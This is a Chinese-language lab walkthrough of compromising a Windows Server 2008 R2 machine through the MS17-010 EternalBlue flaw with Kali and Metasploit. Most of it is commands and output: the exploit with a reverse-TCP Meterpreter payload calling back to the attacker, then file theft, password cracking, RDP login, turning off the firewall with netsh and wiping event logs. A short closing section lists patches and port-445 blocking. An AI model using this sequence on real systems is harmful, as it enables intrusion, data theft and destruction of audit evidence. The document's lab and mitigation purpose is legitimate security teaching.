KALI利用MS17-010漏洞入侵

KALI利用MS17-010漏洞入侵

实验环境

靶机 : Windows Server 2008 R2 ，开放445端口( Windows防火墙不必关闭)。
攻击机: KALI，利用Meterpreter渗透工具漏洞︰MS17-010永恒之蓝(EternalBlue)漏洞。

操作步骤

1）先利用NMAP扫描靶机是否开启了445端口。

2）在kali上启动msfconsole

3）扫描靶机的漏洞情况

4）利用MS17-010漏洞攻击靶机

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue		//切换到漏洞攻击脚本
msf5 exploit(windows/smb/ms17_010_eternalblue) > 
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp		//使用反弹链接payload，让靶机主动连接KALI
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > 
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.10.129	//靶机IP地址
rhost => 192.168.10.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.128	//KAL地址
lhost => 192.168.10.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 	//开始攻击

[*] Started reverse TCP handler on 192.168.10.128:4444 
[*] 192.168.10.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.129:445    - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.10.129:445    - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.10.129:445 - Connecting to target for exploitation.
[+] 192.168.10.129:445 - Connection established for exploitation.
[+] 192.168.10.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.129:445 - CORE raw buffer dump (46 bytes)
[*] 192.168.10.129:445 - 0x00000000  57 69 6e 64 6f 77 73 20 57 65 62 20 53 65 72 76  Windows Web Serv
[*] 192.168.10.129:445 - 0x00000010  65 72 20 32 30 30 38 20 52 32 20 37 36 30 31 20  er 2008 R2 7601 
[*] 192.168.10.129:445 - 0x00000020  53 65 72 76 69 63 65 20 50 61 63 6b 20 31        Service Pack 1  
[+] 192.168.10.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.129:445 - Starting non-paged pool grooming
[+] 192.168.10.129:445 - Sending SMBv2 buffers
[+] 192.168.10.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.129:445 - Sending final SMBv2 buffers.
[*] 192.168.10.129:445 - Sending last fragment of exploit packet!
[*] 192.168.10.129:445 - Receiving response from exploit packet
[+] 192.168.10.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.129:445 - Sending egg to corrupted connection.
[*] 192.168.10.129:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 192.168.10.129
[*] Meterpreter session 1 opened (192.168.10.128:4444 -> 192.168.10.129:49159) at 2020-11-27 12:06:37 +0800
[+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >	//攻击成功，此时靶机已经可以被控制

5）列出靶机C盘下的目录文件

6）下载文件

7）破解用户密码

密文可到www.cmd5.com中去破解。

8）远程桌面登录靶机

root@KALI:~# rdesktop -u administrator -p abc123 192.168.10.129:3389

9）屏幕截图

10）关闭防火墙

meterpreter > shell		//进入靶机的命令提示符环境
Process 2848 created.
Channel 4 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\>
C:\>netsh advfirewall set allprofiles state off		//关闭靶机的防火墙
netsh advfirewall set allprofiles state off
ȷ����

C:\>

11）清楚事件日志

清除前，在靶机上可以看见所有事件日志。

在KALI上清除日志信息

再去靶机上查看,发现只有一条清楚日志的记录.

MS17-010漏洞防范

1) 打补丁

KB976932 ( SP1 )、KB4012212、KB4012215

2) 利用系统防火墙高级设置阻止向445端口进行连接

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.10.128:4444 
[*] 192.168.10.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.129:445    - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.10.129:445    - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.10.129:445 - Connecting to target for exploitation.
[+] 192.168.10.129:445 - Connection established for exploitation.
[+] 192.168.10.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.129:445 - CORE raw buffer dump (46 bytes)
[*] 192.168.10.129:445 - 0x00000000  57 69 6e 64 6f 77 73 20 57 65 62 20 53 65 72 76  Windows Web Serv
[*] 192.168.10.129:445 - 0x00000010  65 72 20 32 30 30 38 20 52 32 20 37 36 30 31 20  er 2008 R2 7601 
[*] 192.168.10.129:445 - 0x00000020  53 65 72 76 69 63 65 20 50 61 63 6b 20 31        Service Pack 1  
[+] 192.168.10.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.129:445 - Starting non-paged pool grooming
[+] 192.168.10.129:445 - Sending SMBv2 buffers
[+] 192.168.10.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.129:445 - Sending final SMBv2 buffers.
[*] 192.168.10.129:445 - Sending last fragment of exploit packet!
[*] 192.168.10.129:445 - Receiving response from exploit packet
[+] 192.168.10.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.129:445 - Sending egg to corrupted connection.
[*] 192.168.10.129:445 - Triggering free of corrupted buffer.
[-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
msf5 exploit(windows/smb/ms17_010_eternalblue) > 

可以看到连接失败!!!